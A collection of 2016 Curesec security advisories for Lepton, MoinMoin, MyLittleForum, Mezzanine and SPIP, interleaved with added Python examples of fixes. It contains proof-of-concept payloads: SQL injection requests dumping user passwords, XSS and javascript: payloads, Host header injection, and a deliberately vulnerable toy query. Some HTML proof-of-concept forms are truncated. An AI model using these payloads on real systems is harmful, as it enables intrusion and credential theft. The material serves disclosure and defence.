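    """Server-chosen storage name: random base plus the (allowlisted) last extension."""
    report = audit_filename(filename)
    if not report["accepted"]:
        raise UploadRejected(f"{filename!r}: {report['reason']}")
    return f"{secrets.token_hex(16)}.{report['segments'][-1]}"


if __name__ == "__main__":
    # Constructed sample names; the first two have the shapes the advisories describe.
    for name in ("shell.pht", "test.png.php5", ".htaccess", "photo.JPG", "notes.txt", "README"):
        print(f"{name:16} -> {audit_filename(name)}")
    print(stored_name("photo.JPG"))
```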

[FD] Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    LEPTON 2.2.2 stable
Fixed in:            2.3.0
Fixed Version Link:  http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website:      http://www.lepton-cms.org/
Vulnerability Type:  CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it
contains various low to medium impact issues. The functionality that operates
on files and folders is vulnerable to CSRF which may lead to XSS, the logout is
vulnerable to Open Redirect, the in-build bruteforce protection can be easily
bypassed, and passwords are hashed with md5 and send out via email in
plaintext.

3. Details

CSRF

CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P

Description: All actions on folders and files are missing CSRF protection.
Because of this, an attacker can delete, create, or rename folders and files.
An attacker could for example create .html files which would lead to an XSS
attack.

Proof of Concept:

Delete Folder:
http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=delete_folder" method="POST">

Create File:
http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=create_file" method="POST">

Open Redirect

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The redirect parameter of the logout script is vulnerable to open
redirect.

Proof of Concept:

http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://google.com

Insufficient Bruteforce Protection

Description: The bruteforce protection works on a per-session base, which is
easily bypassed by an attacker by simply requesting a new session by not
sending the current, locked session information. The current bruteforce
protection may provide a false sense of security and should thus be removed or
changed.

Code:

if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); }

Password Handling

The password reset functionality sends a newly generated password in plaintext
via email, which is not recommended.

Additionally, md5 is used for hashing, which is also not recommended.

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

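The snippet above keeps the failed-attempt counter in $_SESSION, so a client that drops its cookie whenever it is locked starts from zero, and the advisory's password remarks concern unsalted md5. The following added example (not Lepton's code) models both limiter designs side by side, so the bypass can be measured, and pairs them with a salted PBKDF2 password hash. The threshold, window, account name and addresses are constructed for illustration.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict

MAX_ATTEMPTS = 5            # lockout threshold, as in the advisory's max_attemps
WINDOW_SECONDS = 15 * 60    # how long failures count against an account


class SessionKeyedLimiter:
    """Models the advisory's $_SESSION['ATTEMPS'] counter: the only state is in the session."""

    def __init__(self):
        self.sessions = {}                 # session id -> failed attempts

    def new_session(self) -> str:
        sid = os.urandom(8).hex()
        self.sessions[sid] = 0
        return sid

    def record_failure(self, sid: str) -> bool:
        """Count a failure; True when this session is now over the limit."""
        self.sessions[sid] = self.sessions.get(sid, 0) + 1
        return self.sessions[sid] > MAX_ATTEMPTS


class AccountKeyedLimiter:
    """Server-side counter keyed on (account, source address), independent of any cookie."""

    def __init__(self, now=time.time):
        self.failures = defaultdict(list)  # (username, ip) -> failure timestamps
        self.now = now

    def _recent(self, key):
        cutoff = self.now() - WINDOW_SECONDS
        self.failures[key] = [t for t in self.failures[key] if t > cutoff]
        return self.failures[key]

    def is_locked(self, username: str, ip: str) -> bool:
        return len(self._recent((username.lower(), ip))) >= MAX_ATTEMPTS

    def record_failure(self, username: str, ip: str) -> None:
        self._recent((username.lower(), ip)).append(self.now())


def guesses_before_lockout(limiter_kind: str, total_guesses: int) -> int:
    """How many of total_guesses wrong passwords one client gets to submit.

    The client behaves as the advisory describes: whenever its session is
    locked it simply drops the cookie and receives a fresh session.
    """
    allowed = 0
    if limiter_kind == "session":
        limiter = SessionKeyedLimiter()
        sid = limiter.new_session()
        for _ in range(total_guesses):
            if limiter.record_failure(sid):
                sid = limiter.new_session()   # locked? start over with a new session
            allowed += 1
    else:
        limiter = AccountKeyedLimiter()
        for _ in range(total_guesses):
            if limiter.is_locked("admin", "203.0.113.5"):
                break                          # no cookie trick helps here
            limiter.record_failure("admin", "203.0.113.5")
            allowed += 1
    return allowed


# Password storage: a salted, slow KDF instead of unsalted md5.
PBKDF2_ROUNDS = 200_000


def hash_password(password: str) -> str:
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _, rounds, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("session-keyed limiter, guesses allowed out of 100:", guesses_before_lockout("session", 100))
    print("account-keyed limiter, guesses allowed out of 100:", guesses_before_lockout("account", 100))
    stored = hash_password("correct horse battery staple")
    print(stored, verify_password("correct horse battery staple", stored))
```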

[FD] Lepton 2.2.2: SQL Injection

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    LEPTON 2.2.2 stable
Fixed in:            2.3.0
Fixed Version Link:  http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website:      http://www.lepton-cms.org/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to multiple SQL injections. The injections require a user account
with elevated privileges.

3. Details

SQL Injection: Search Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "terms" parameter of the page search is vulnerable to SQL
Injection. A user account with the right "Pages" is required to access this
feature.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken=3f7020b05ec343675b6b2z1472137594 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

search_scope=title&terms=" union select username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from lep_users -- -&search=Search

Blind or Error-based SQL Injection: Create Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "parent" parameter of the create page functionality is
vulnerable to SQL Injection. A user account with the right "Pages" is required
to access this feature. The injection is blind or error based in the case that
PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken=dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

title=test&type=wysiwyg&parent=0 union select version()&visibility=public&submit=Add

Blind or Error-based SQL Injection: Add Droplet

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "Add_droplets" parameter of the droplet permission manager is
vulnerable to SQL injection. A user account with access to the Droplets
administration tool is required. The injection is blind or error based in the
case that PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets&leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 277

tool=droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute='Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1&Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1&Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

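All three injections above have the same root cause: a form value ("terms", "parent", Add_droplets[]) is spliced into the SQL text. The following added example (not Lepton's code) rebuilds a page search on an in-memory SQLite database with constructed rows, so that the string-built query and its parameterised replacement can be run against the same input; a UNION payload of the advisory's shape leaks the sample user row from the first and is just a literal search term to the second. Numeric fields such as "parent" are validated as integers before any SQL is built.

```python
import sqlite3

# Constructed schema and rows modelled on the table names in the advisory; not real data.
SCHEMA = """
CREATE TABLE lep_pages (page_id INTEGER PRIMARY KEY, page_title TEXT, description TEXT);
CREATE TABLE lep_users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT);
INSERT INTO lep_pages VALUES (1, 'Welcome', 'Start page');
INSERT INTO lep_pages VALUES (2, 'Contact', 'How to reach us');
INSERT INTO lep_users VALUES (1, 'admin', '<md5 hash placeholder>', 'admin@example.test');
"""


def connect() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def search_pages_vulnerable(con: sqlite3.Connection, terms: str):
    """String-built query: the search term is spliced into the SQL text.

    Reproduces the defect class of the 'terms' injection; single quotes are used
    because this toy runs on SQLite rather than MySQL.
    """
    sql = ("SELECT page_id, page_title, description FROM lep_pages "
           f"WHERE page_title LIKE '%{terms}%'")
    return con.execute(sql).fetchall()


def search_pages_safe(con: sqlite3.Connection, terms: str):
    """Parameterised query: the SQL text is fixed, the driver binds the value."""
    sql = ("SELECT page_id, page_title, description FROM lep_pages "
           "WHERE page_title LIKE ?")
    return con.execute(sql, (f"%{terms}%",)).fetchall()


def parse_parent_id(parent: str) -> int:
    """Numeric form fields (the 'parent' page id) are validated before any SQL is built."""
    if not parent.isdigit():
        raise ValueError(f"parent must be a non-negative integer, got {parent!r}")
    return int(parent)


def leaks_user_rows(rows) -> bool:
    """True if any returned row carries the sample user name in the title column."""
    return any(row[1] == "admin" for row in rows)


if __name__ == "__main__":
    con = connect()
    # UNION payload of the same shape as the advisory's, adjusted to the 3-column toy query.
    payload = "' union select user_id, username, password from lep_users -- -"
    print("vulnerable:", search_pages_vulnerable(con, payload))
    print("safe      :", search_pages_safe(con, payload))
    print("normal    :", search_pages_safe(con, "cont"))
    for value in ("0", "0 union select version()"):
        try:
            print("parent ok:", parse_parent_id(value))
        except ValueError as exc:
            print("parent rejected:", exc)
```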

[FD] MoinMoin 1.9.8: XSS

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MoinMoin 1.9.8
Fixed in:            1.9.9
Fixed Version Link:  http://static.moinmo.in/files/moin-1.9.9.tar.gz
Vendor Website:      https://moinmo.in
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 CVE-2016-7148, CVE-2016-7146
Credits:             Tim Coen of Curesec GmbH

2. Overview

MoinMoin is an open source Wiki application written in python. In version
1.9.8, it is vulnerable to two persistent XSS issues. This allows an attacker
to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS (CVE-2016-7148)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: A page name is echoed in the attach file page without encoding,
leading to persistent XSS.

Proof of Concept:

To place the payload, create a new page which contains the payload as name by visiting:
http://localhost:9090/newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=edit

To trigger the payload, visit the attach file page:
http://localhost:9090/newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=AttachFile

Note that there must be at least one existing attachment.

XSS 2: Persistent XSS (CVE-2016-7146)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The GUI editor is vulnerable to XSS via a specifically crafted
URL, as it echoes part of the URL without encoding in two different places. The
issue can be exploited reflected or persistent.

Proof of Concept:

Reflected example (the page does not have to exist):
http://localhost:9090/'"> ?action=fckdialog&dialog=attachment

Alternatively, an attacker can create a page containing the payload:
http://localhost:9090/newtestfoo'%22%3E%3Cimg%20src=no%20onerror=alert(1)%3E

The payload is triggered when attaching a file via the GUI editor ("Edit (GUI)" -> "Attachment").

4. Solution

To mitigate this issue please upgrade at least to version 1.9.9:

http://static.moinmo.in/files/moin-1.9.9.tar.gz

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVEs
09/06/2016 CVEs assigned and distributed to vendor
10/05/2016 Vendor requests more time
10/31/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MoinMoin-198-XSS-175.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany


[FD] MyLittleForum 2.3.6.1: CSRF

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyLittleForum 2.3.6.1
Fixed in:            2.3.7beta
Fixed Version Link:  https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta
Vendor Website:      http://mylittleforum.net/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is
vulnerable to cross site request forgery. An attacker could exploit this issue
to add new users or change the status of existing users to administrator if a
victim visits a website containing a specifically crafted payload while logged
into MyLittleForum.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description: There is no CSRF protection, allowing an attacker to perform
actions for a victim if the victim visits an attacker controlled website while
logged in.

Proof of Concept:

Add New User:
http://localhost/mylittleforum-2.3.6.1/index.php" method="POST">

Make Existing User Admin:

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:

https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyLittleForum-2361-CSRF-176.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany


[FD] Mezzanine 4.2.0: XSS

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Mezzanine 4.2.0
Fixed in:            4.2.1
Fixed Version Link:  https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Vendor Website:      http://mezzanine.jupo.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Mezzanine is an open source CMS written in python. In version 4.2.0, it is
vulnerable to two persistent XSS attacks, one of which requires extended
privileges, the other one does not. These issues allow an attacker to steal
cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS via Name in Comments

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When leaving a comment on a blog post, the author name is echoed
unencoded in the backend, leading to persistent XSS.

Proof of Concept:

Leave a comment and, as author name, use: '">  (the remainder of the payload
was not preserved in this copy)
To trigger the payload, view the comment overview in the admin backend:
http://localhost:8000/admin/generic/threadedcomment

XSS 2: Persistent XSS via HTML file upload

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

Description: When uploading files via the media manager, the extension .html is
allowed, leading to XSS via file upload. An account with the permissions to
upload files to the media manager is required.

Proof of Concept:

Visit the media manager and upload a .html file:
http://localhost:8000/admin/media-library/upload/?ot=desc&o=date
As uploaded files are stored inside the web root, the file can now be accessed,
thus executing the JavaScript code it contains:
http://localhost:8000/static/media/uploads/xss.html

4. Solution

To mitigate this issue please upgrade at least to version 4.2.1:

https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/05/2016 Vendor replies
09/19/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html
 
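For the second Mezzanine finding (XSS 2) the fix has two independent halves: refuse to store file types a browser will execute as a document, and serve whatever is stored in a way that cannot run script. The Python below is an added example, not Mezzanine's own code; ALLOWED_UPLOAD_EXTENSIONS, ACTIVE_EXTENSIONS and the header set are assumptions a deployer would tune. It normalises the filename before checking (directory parts, case, trailing dots and spaces), rejects any name in which an active type appears in any extension segment (so xss.jpg.html and xss.html.jpg are both refused, since Apache's mod_mime may act on every segment), treats SVG and XHTML as active because they also carry inline script, and returns the response headers that make an inline-served upload inert.

```python
import posixpath

# Assumed operator policy (not Mezzanine's configuration): extensions the media
# library may store. This is an allow-list; anything not listed is refused.
ALLOWED_UPLOAD_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "webp", "pdf", "zip", "txt"}

# Types a browser (or the web server) treats as an active document or script.
# Used as a second, belt-and-braces check on *every* extension segment.
ACTIVE_EXTENSIONS = {"html", "htm", "xhtml", "shtml", "mht", "svg", "xml",
                     "js", "php", "phtml", "phar"}


def normalise_upload_name(filename: str) -> str:
    """Strip directory parts, NUL bytes and trailing dots/spaces (Windows drops
    them when creating the file) and lower-case the name for a uniform check."""
    name = filename.replace("\x00", "")
    name = posixpath.basename(name.replace("\\", "/"))
    return name.rstrip(". ").lower()


def is_allowed_upload(filename: str) -> bool:
    """True only if the last extension is allow-listed and no extension segment
    is an active type. Dot-files and extensionless names are refused."""
    name = normalise_upload_name(filename)
    parts = name.split(".")
    if len(parts) < 2 or parts[0] == "":
        return False
    segments = parts[1:]
    if any(seg in ACTIVE_EXTENSIONS for seg in segments):
        return False
    return segments[-1] in ALLOWED_UPLOAD_EXTENSIONS


def inert_download_headers(filename: str) -> dict:
    """Headers to send when serving stored uploads from the web root.

    Content-Disposition: attachment stops the browser rendering the file as a
    page even if an HTML file slipped through; nosniff stops MIME guessing; the
    CSP sandbox blocks script in any document that is still rendered inline.
    """
    safe_name = normalise_upload_name(filename).replace('"', "")
    return {
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
```

The extension check runs at upload time; the headers belong on the route (or web-server location block) that serves the upload directory, so that files already present before the fix are covered as well.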

[FD] SPIP 3.1: XSS & Host Header Injection

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    SPIP 3.1
Fixed in:            3.1.2 / 3.0.23
Fixed Version Link:  http://www.spip.net/en_download
Vendor Website:      http://www.spip.net/
Vulnerability Type:  Reflected & Persistent XSS, Host Header Injection,
                     httpOnly Cookie disclosure
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

SPIP is a content management system written in PHP. In version 3.1, it is
vulnerable to a persistent as well as a reflected cross site scripting
vulnerability, as it allows users to enter URLs containing the JavaScript
protocol, which an attacker can exploit to steal cookies, inject JavaScript
keyloggers, or bypass CSRF protection. Additionally, it contains a Host Header
Injection which may lead to the leakage of password reset tokens and thus the
compromise of user accounts. Finally, the application discloses httpOnly
cookies, making exploitation of XSS issues slightly easier.

3. Details

Persistent XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: When posting a message in the internal Forum, user input is
properly encoded, thus disallowing XSS. However, a hypertext link may be added
as well, and there is no check on the protocol of the supplied link, which
leads to an XSS vulnerability.

Proof of Concept:

1. Create a new Message: http://localhost/spip/ecrire/?exec=forum&repondre=new
2. In the URL field enter: javascript:alert(1)
3. Post the Message

To trigger the payload, a click on the link is required.

Reflected XSS

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: When editing a private message, a redirect parameter may be
submitted as well. This parameter decides to what page a user is returned if
they were to press the back button. The value of this parameter is user
controlled and may thus be used for phishing or XSS attacks.

Proof of Concept:

Visit: http://localhost/spip/ecrire/?exec=message_edit&new=oui&to=2&redirect=javascript:alert(1)
Click on the Back button represented by the envelope icon.

Host Header Injection

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N

Description:
The application takes the Host Header and uses it in a password reset email. As
the Host Header is user-controlled, an attacker can set it to arbitrary values.

In the case of a password reset page, this can lead to security issues, as an
attacker can request a password reset email for a user and set the Host header
to a server they control. As this header is used in the email, the user would be
sent to the attacker's server if they were to click on the link, leading to the
leakage of the recovery token and thus the compromise of the account.

Proof of Concept:

Request:

POST /spip/spip.php?page=spip_pass&lang=en HTTP/1.1
Host: example.com
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: spip_accepte_ajax=1; spip_admin=%40admin; PHPSESSID=1l8rvbhcgia45ddj7ldoc1gpf6; wb-installer=3d2hes1b6i0bfb586iucm76sp2; wb-4174-sid=u571gr7isplq8b4f01fniqevk2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

page=spip_pass&lang=en&formulaire_action=oubli&formulaire_action_args=orESpF0vSC3Q%2BB30uGEFqT7k6AcDObDMasMNzVp3EjndtlvZ%2B5k4g%2FkyF%2BAlzhBhCI%2F%2F9hx%2FZ33mkQPk&oubli=visitor%40example.com&nobot=

Email sent:

[My SPIP site] Forgotten password (this is an automated message)

To recover your access to the site My SPIP site (http://localhost/spip)
Please go to the following address:
http://example.com/spip/spip.php?page=spip_pass&p=107017475657c15ad6e9c781.23674073
You can then enter a new password and log in to the site.

httpOnly Cookie Disclosure

Description: The phpinfo page discloses httpOnly cookies such as session
cookies, making it slightly easier to exploit XSS vulnerabilities.

Proof of Concept:

http://localhost/spip/ecrire/?exec=info

4. Solution

To mitigate this issue please upgrade at least to version 3.1.2:

http://www.spip.net/en_download

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/23/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/SPIP-31-XSS-amp-Host-Header-Injection-178.html
 
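The three SPIP findings above (javascript: in a stored link, javascript: in the redirect parameter, and the Host header in the reset email) share one fix pattern: never trust a URL or host name that arrives from the client. The Python below is an added example, not SPIP's code, showing (1) a scheme allow-list for user-supplied links, applied after removing the control characters browsers tolerate inside a scheme, (2) a redirect-target check that accepts only a same-site absolute path, and (3) building the password-reset link from a configured base URL while only *validating* the Host header against it. SITE_BASE_URL and ALLOWED_LINK_SCHEMES are assumed deployment values; HTML entities in the input are assumed to have been decoded before these checks run.

```python
import re
import urllib.parse
from typing import Optional

# Assumed deployment constant (example value, not SPIP configuration): the
# canonical public origin, set by the operator, never derived from the request.
SITE_BASE_URL = "https://forum.example.com/spip"

ALLOWED_LINK_SCHEMES = {"http", "https", "mailto"}

# Browsers strip tabs, newlines and other C0 controls before parsing a scheme,
# so "java\tscript:" is still javascript: to them; strip them first.
_CTRL = re.compile(r"[\x00-\x20\x7f]")


def safe_link(url: str) -> Optional[str]:
    """Return the URL if it is relative or its scheme is allow-listed, else None.

    urlsplit lower-cases the scheme, so JaVaScRiPt:, data:, vbscript: and any
    unlisted scheme are rejected regardless of case.
    """
    cleaned = _CTRL.sub("", url)
    parsed = urllib.parse.urlsplit(cleaned)
    if parsed.scheme == "":
        return cleaned or None          # e.g. "/spip.php?article1"
    if parsed.scheme in ALLOWED_LINK_SCHEMES:
        return cleaned
    return None


def safe_redirect_target(target: str, default: str = "/") -> str:
    """Accept only a same-site absolute path for a 'redirect' parameter.

    Rejects anything with a scheme (javascript: included), protocol-relative
    "//host" forms, and "/\\host", which some browsers read as "//host".
    """
    cleaned = _CTRL.sub("", target)
    parsed = urllib.parse.urlsplit(cleaned)
    if parsed.scheme or parsed.netloc:
        return default
    if not cleaned.startswith("/") or cleaned.startswith(("//", "/\\")):
        return default
    return cleaned


def password_reset_url(token: str, request_host_header: str) -> str:
    """Build the reset link from SITE_BASE_URL; the Host header is only checked.

    A forged Host therefore cannot steer the victim's token anywhere: a request
    whose Host does not match the configured origin is refused outright.
    """
    expected_host = urllib.parse.urlsplit(SITE_BASE_URL).netloc
    if request_host_header.strip().lower() != expected_host.lower():
        raise ValueError(f"unexpected Host header: {request_host_header!r}")
    query = urllib.parse.urlencode({"page": "spip_pass", "p": token})
    return f"{SITE_BASE_URL}/spip.php?{query}"
```

Note that safe_link deliberately keeps the URL out of the HTML-escaping step: scheme validation and output encoding are separate controls, and the persistent XSS above exists precisely because the application encoded the text but not the link target.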

[FD] MyLittleForum 2.3.6.1: XSS & RPO

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyLittleForum 2.3.6.1
Fixed in:            2.3.7beta
Fixed Version Link:  https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta
Vendor Website:      http://mylittleforum.net/
Vulnerability Type:  XSS & RPO
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is
vulnerable to reflected cross site scripting as well as relative path
overwrite. XSS can be used to steal cookies, inject JavaScript keyloggers, or
bypass CSRF protection, and RPO may lead to CSS injection.

3. Details

Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The username and email parameter of the add user page are
vulnerable to reflected XSS.

Proof of Concept:

(HTML form, markup not preserved in this copy, that posts to
http://localhost/mylittleforum-2.3.6.1/index.php with method="POST"; the only
surviving fragment of the injected field values is: alert(1)" />)

Relative Path Overwrite

Description: Because the application includes CSS files using relative instead
of absolute paths, an attacker can overwrite the path. With some browsers, this
may lead to CSS injection.

Proof of Concept:

http://localhost/mylittleforum-2.3.6.1/index.php?id=1

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:

https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyLittleForum-2361-XSS-amp-RPO-179.html
 
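The RPO finding above is easiest to see with the browser's own URL resolution. The Python below is an added example, not MyLittleForum code: it resolves a relative stylesheet reference the way a browser does, first for the normal page URL and then for a URL with extra path segments appended after index.php (PATH_INFO, which PHP hands to the same script), which is what lets an attacker make the page fetch its own HTML as its stylesheet; it also scans markup for stylesheet links with relative hrefs, the check a reviewer would run over the templates. SAMPLE_PAGE is constructed for the example and is not the forum's real template.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed page fragment (not MyLittleForum's template) showing the pattern:
# one stylesheet referenced relative to the document, two referenced safely.
SAMPLE_PAGE = """
<html><head>
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="/mylittleforum-2.3.6.1/css/print.css">
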